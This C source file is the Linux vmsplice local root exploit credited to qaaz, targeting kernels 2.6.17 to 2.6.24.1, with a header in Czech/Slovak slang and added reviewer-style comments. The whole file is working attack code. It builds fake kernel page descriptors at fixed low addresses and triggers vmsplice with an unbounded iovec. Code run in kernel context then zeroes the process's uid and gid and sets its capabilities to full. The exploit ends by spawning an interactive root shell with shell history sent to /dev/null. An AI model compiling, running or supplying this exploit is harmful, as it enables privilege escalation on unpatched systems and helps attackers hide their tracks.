/*
 * jessica_biel_naked_in_my_bed.c
 *
 * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
 * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
 * Stejnak je to stare jak cyp a aj jakesyk rozbite.
 *
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 *
 * This is quite old code and I had to rewrite it to even compile.
 * It should work well, but I don't remember the original intent of all
 * the code, so I'm not 100% sure about it. You've been warned ;)
 *
 * Compile flags: -static -Wno-format
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
/* Pretend to be kernel code so that asm/unistd.h exposes the _syscall4()
 * stub generator used for _vmsplice() below (only on headers that still
 * provide it -- see the #if defined(_syscall4) fallback). A user-space
 * build defining __KERNEL__ is a review red flag in any other context. */
#define __KERNEL__
#include <asm/unistd.h>
  33.  
/* Assumed number of pipe slots on the target kernel; only sizes the large
 * mapping in main() ((PIPE_BUFFERS * 3 + 2) pages). Not verified at runtime. */
#define PIPE_BUFFERS    16
/* Bit index of the compound-page flag in struct page.flags on the targeted
 * kernels; main() sets this bit on the fake descriptors. Assumed layout,
 * not checked against the running kernel. */
#define PG_compound 14
#define uint        unsigned int
/* Forces inlining of the helpers that kernel_code() calls while it is
 * running in kernel context (exit_kernel(), get_current()). */
#define static_inline   static inline __attribute__((always_inline))
/* Address 40 bytes below the end of array x; x must be a real array, since
 * sizeof(x) is its full size. Used as the user stack in the iret frame. */
#define STACK(x)    (x + sizeof(x) - 40)

/* 4096-byte pages. Redefined here (after asm/page.h) in the kernel header's
 * own form; the __ASSEMBLY__ branch is never taken in this C build. */
#define PAGE_SHIFT      12
#ifdef __ASSEMBLY__
#define PAGE_SIZE       (1 << PAGE_SHIFT)
#else
#define PAGE_SIZE       (1UL << PAGE_SHIFT)
#endif
  46.  
/*
 * User-space copy of the page-descriptor layout this code assumes for the
 * targeted kernels. main() builds fake descriptors with it and writes only
 * flags, count, private and lru.next. Field order and sizes must match the
 * running kernel exactly or the fake descriptors are misread -- nothing in
 * this file verifies that.
 */
struct page {
    unsigned long flags;    /* page flag bits; main() sets 1 << PG_compound */
    int count;              /* presumably the page reference count; main() writes 1 */
    int mapcount;
    unsigned long private;  /* main() points this at the descriptor itself */
    void *mapping;
    unsigned long index;
    struct { long next, prev; } lru;    /* lru.next of the *second* descriptor receives kernel_code's address */
};
  56.  
/* Defined below: user-mode continuation used as the return target of the
 * iret frame in exit_kernel() and as the SIGPIPE handler installed in main(). */
void    exit_code();
/* 1 MiB buffer whose top (see STACK()) becomes the user stack pointer in the
 * iret frame built by exit_kernel(). */
char    exit_stack[1024 * 1024];
  59.  
/*
 * Report a fatal condition and terminate.
 *
 * Prints "[-] msg" to stdout, appending ": <strerror(err)>" when err is
 * non-zero, flushes both standard streams and exits with status 1.
 * Never returns.
 *
 * @param msg  short description of what failed
 * @param err  errno value to describe, or 0 for none
 */
void    die(char *msg, int err)
{
    if (err)
        printf("[-] %s: %s\n", msg, strerror(err));
    else
        printf("[-] %s\n", msg);

    fflush(stdout);
    fflush(stderr);
    exit(1);
}
  67.  
#if defined (__i386__)

/* i386 system call number for vmsplice, used only when the header did not
 * already define it. */
#ifndef __NR_vmsplice
#define __NR_vmsplice   316
#endif

/* Values placed in the iret frame by exit_kernel(): user code-segment
 * selector, user stack-segment selector, and EFLAGS (0x246 has the
 * interrupt-enable bit 0x200 set). */
#define USER_CS     0x73
#define USER_SS     0x7b
#define USER_FL     0x246
  77.  
/*
 * Leave kernel mode by hand (i386). Writes a five-word iret frame at the
 * current stack pointer -- from the top down SS, ESP, EFLAGS, CS, EIP --
 * and executes iret, so execution resumes in user mode in exit_code()
 * with exit_stack as the stack. Only called from kernel_code(); never
 * returns.
 */
static_inline
void    exit_kernel()
{
    __asm__ __volatile__ (
    "movl %0, 0x10(%%esp) ;"    /* SS     = USER_SS */
    "movl %1, 0x0c(%%esp) ;"    /* ESP    = STACK(exit_stack) */
    "movl %2, 0x08(%%esp) ;"    /* EFLAGS = USER_FL */
    "movl %3, 0x04(%%esp) ;"    /* CS     = USER_CS */
    "movl %4, 0x00(%%esp) ;"    /* EIP    = exit_code */
    "iret"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
        "i" (USER_CS), "r" (exit_code)
    );
}
  92.  
/*
 * i386: round the current stack pointer down to an 8 KiB boundary
 * (esp & ~8191) and return the pointer stored in the first word there.
 * kernel_code() treats the result as the start of the current task's
 * data; presumably that word is thread_info->task on these kernels --
 * confirm against the target kernel's layout. Only meaningful when run
 * in kernel context.
 */
static_inline
void *  get_current()
{
    unsigned long curr;
    __asm__ __volatile__ (
    "movl %%esp, %%eax ;"
    "andl %1, %%eax ;"      /* mask to the 8 KiB-aligned block containing the stack */
    "movl (%%eax), %0"      /* first word of that block */
    : "=r" (curr)
    : "i" (~8191)
    );
    return (void *) curr;
}
  106.  
#elif defined (__x86_64__)

/* x86_64 system call number for vmsplice, used only when the header did
 * not already define it. */
#ifndef __NR_vmsplice
#define __NR_vmsplice   278
#endif

/* Values placed in the iretq frame by exit_kernel(): user code-segment
 * selector, user stack-segment selector, and RFLAGS (0x246 has the
 * interrupt-enable bit 0x200 set). */
#define USER_CS     0x23
#define USER_SS     0x2b
#define USER_FL     0x246
  116.  
/*
 * Leave kernel mode by hand (x86_64). swapgs swaps the GS base back to
 * the user value, then a five-quadword iretq frame is written at the
 * current stack pointer -- from the top down SS, RSP, RFLAGS, CS, RIP --
 * and iretq resumes user mode in exit_code() with exit_stack as the
 * stack. Only called from kernel_code(); never returns.
 */
static_inline
void    exit_kernel()
{
    __asm__ __volatile__ (
    "swapgs ;"
    "movq %0, 0x20(%%rsp) ;"    /* SS     = USER_SS */
    "movq %1, 0x18(%%rsp) ;"    /* RSP    = STACK(exit_stack) */
    "movq %2, 0x10(%%rsp) ;"    /* RFLAGS = USER_FL */
    "movq %3, 0x08(%%rsp) ;"    /* CS     = USER_CS */
    "movq %4, 0x00(%%rsp) ;"    /* RIP    = exit_code */
    "iretq"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
        "i" (USER_CS), "r" (exit_code)
    );
}
  132.  
/*
 * x86_64: return the quadword at offset 0 from the kernel GS base
 * (%gs:0). kernel_code() treats it as the start of the current task's
 * data; presumably the per-CPU "current" pointer on these kernels --
 * confirm against the target kernel. Only meaningful in kernel context,
 * before exit_kernel()'s swapgs.
 */
static_inline
void *  get_current()
{
    unsigned long curr;
    __asm__ __volatile__ (
    "movq %%gs:(0), %0"
    : "=r" (curr)
    );
    return (void *) curr;
}
  143.  
#else
/* Only i386 and x86_64 are supported: the inline asm above and the
 * int[2]-to-pointer casts in main() assume little-endian x86. */
#error "unsupported arch"
#endif
  147.  
/*
 * _vmsplice(fd, iov, nr_segs, flags): raw vmsplice(2) system call.
 * When asm/unistd.h (included with __KERNEL__ defined) still provides the
 * _syscall4() stub generator it is used to emit a real function; the
 * __NR__vmsplice alias exists because the stub evidently looks the number
 * up as __NR_ followed by the function name. Otherwise a plain syscall(2)
 * macro with the per-arch __NR_vmsplice above is used. Either way the
 * return value is ignored by the only caller (main()).
 */
#if defined (_syscall4)
#define __NR__vmsplice  __NR_vmsplice
_syscall4(
    long, _vmsplice,
    int, fd,
    struct iovec *, iov,
    unsigned long, nr_segs,
    unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)  syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
  160.  
  161. static uint uid, gid;
  162.  
/*
 * Code intended to run in kernel context, reached through the lru.next
 * pointer that main() plants in the fake page descriptors.
 *
 * Starting at get_current(), scans up to 1024-13 consecutive uints for
 * the first run of four words equal to uid followed by four equal to gid,
 * zeroes all eight, then skips those eight words plus one pointer-sized
 * field and sets the next three words to ~0. The assumption (not checked
 * here) is that the matched words are the task's uid/gid quadruples and
 * the three words after them its capability sets -- a layout specific to
 * the kernel range named in the file header. main()'s refusal to run with
 * uid or gid 0 keeps the pattern from matching zeroed fields. If nothing
 * matches, nothing is written and exit_code() later reports "wtf".
 * Always ends in exit_kernel(); never returns.
 */
void    kernel_code()
{
    int i;
    uint    *p = get_current();

    for (i = 0; i < 1024-13; i++) {
        if (p[0] == uid && p[1] == uid &&
            p[2] == uid && p[3] == uid &&
            p[4] == gid && p[5] == gid &&
            p[6] == gid && p[7] == gid) {
            p[0] = p[1] = p[2] = p[3] = 0;
            p[4] = p[5] = p[6] = p[7] = 0;
            /* step past the eight matched words and one pointer-sized field */
            p = (uint *) ((char *)(p + 8) + sizeof(void *));
            p[0] = p[1] = p[2] = ~0;
            break;
        }
        p++;
    }

    /* back to user mode in exit_code() regardless of whether a match was found */
    exit_kernel();
}
  184.  
/*
 * User-mode continuation. Reached two ways: as the return address of the
 * iret frame built by exit_kernel(), and as the SIGPIPE handler installed
 * in main() (the empty parameter list is why it can be passed to signal();
 * the signal number argument is simply ignored).
 *
 * Dies with "wtf" unless the process is now uid 0; otherwise points
 * HISTFILE at /dev/null -- so the spawned shell leaves no history, a
 * detail worth noting for forensics -- and replaces the process with an
 * interactive /bin/bash. Only reaches die() if execl fails.
 */
void    exit_code()
{
    if (getuid() != 0)
        die("wtf", 0);

    printf("[+] root\n");
    putenv("HISTFILE=/dev/null");
    execl("/bin/bash", "bash", "-i", NULL);
    die("/bin/bash", errno);
}
  195.  
/*
 * Sets up the user-space memory layout the vulnerable vmsplice path is
 * expected to walk into, then issues the system call. argc/argv are
 * unused. Every failure path goes through die(); success never returns
 * here -- control is expected to come back via exit_code() (through the
 * iret frame in exit_kernel() or the SIGPIPE handler).
 *
 * Review notes, in order of appearance:
 *  - The int[2]-to-pointer casts read sizeof(void *) bytes out of a
 *    two-int array: on x86_64 (little-endian) {0,PAGE_SIZE} yields
 *    PAGE_SIZE << 32 and {PAGE_SIZE,0} yields PAGE_SIZE; on i386 only the
 *    first int is read, so {0,PAGE_SIZE} is address 0.
 *  - MAP_FIXED mappings at such low addresses are refused by later
 *    kernels (vm.mmap_min_addr), so "mmap" via die() is the expected
 *    failure on a hardened or patched system.
 *  - The printf("0x%lx", pointer) calls pass pointers for %lx; that is
 *    the reason for -Wno-format in the header.
 */
int main(int argc, char *argv[])
{
    int     pi[2];
    size_t      map_size;
    char *      map_addr;
    struct iovec    iov;
    struct page *   pages[5];

    /* Make real/effective/saved ids identical: kernel_code() looks for
     * four equal uid words followed by four equal gid words. */
    uid = getuid();
    gid = getgid();
    setresuid(uid, uid, uid);
    setresgid(gid, gid, gid);

    printf("-----------------------------------\n");
    printf(" Linux vmsplice Local Root Exploit\n");
    printf(" By qaaz\n");
    printf("-----------------------------------\n");

    /* A zero uid/gid would make kernel_code()'s pattern match zeroed memory. */
    if (!uid || !gid)
        die("!@#$", 0);

    /* ---- first pair of fake page descriptors at a fixed low address ---- */
    pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
    pages[1] = pages[0] + 1;    /* sizeof(struct page) bytes further on */

    map_size = PAGE_SIZE;
    map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);

    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx\n", pages[0]);
    printf("[+] page: 0x%lx\n", pages[1]);

    /* Descriptor marked compound, self-referencing private, count 1; the
     * following descriptor's lru.next carries kernel_code's address --
     * presumably the slot the kernel later calls through (see kernel_code()). */
    pages[0]->flags    = 1 << PG_compound;
    pages[0]->private  = (unsigned long) pages[0];
    pages[0]->count    = 1;
    pages[1]->lru.next = (long) kernel_code;

    /* ---- second pair: placed at the value of pages[0]->flags, i.e. at
     * address 1 << PG_compound, since that is the first word of pages[0] ---- */
    pages[2] = *(void **) pages[0];
    pages[3] = pages[2] + 1;

    map_size = PAGE_SIZE;
    map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);

    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx\n", pages[2]);
    printf("[+] page: 0x%lx\n", pages[3]);

    pages[2]->flags    = 1 << PG_compound;
    pages[2]->private  = (unsigned long) pages[2];
    pages[2]->count    = 1;
    pages[3]->lru.next = (long) kernel_code;

    /* ---- a zeroed page at address PAGE_SIZE on both architectures ---- */
    pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
    map_size = PAGE_SIZE;
    map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);
    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx\n", pages[4]);

    /* ---- large anonymous buffer handed to vmsplice: (PIPE_BUFFERS*3+2) pages ---- */
    map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
    map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);

    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

    /* ---- punch a one-page hole: drop two pages from the size and unmap
     * the page now just past it, leaving the final page of the original
     * mapping in place ---- */
    map_size -= 2 * PAGE_SIZE;
    if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
        die("munmap", errno);

    /* ---- pipe with the read end already closed, so a write raises SIGPIPE ---- */
    if (pipe(pi) < 0) die("pipe", errno);
    close(pi[0]);

    /* Deliberately absurd length: presumably relies on the vulnerable
     * kernel not validating the user range -- a fixed kernel should reject
     * this iovec instead. */
    iov.iov_base = map_addr;
    iov.iov_len  = ULONG_MAX;

    /* exit_code() is both the SIGPIPE handler and the iret target; if the
     * system call simply returns, the attempt failed and die() reports it. */
    signal(SIGPIPE, exit_code);
    _vmsplice(pi[1], &iov, 1, 0);
    die("vmsplice", errno);
    return 0;
}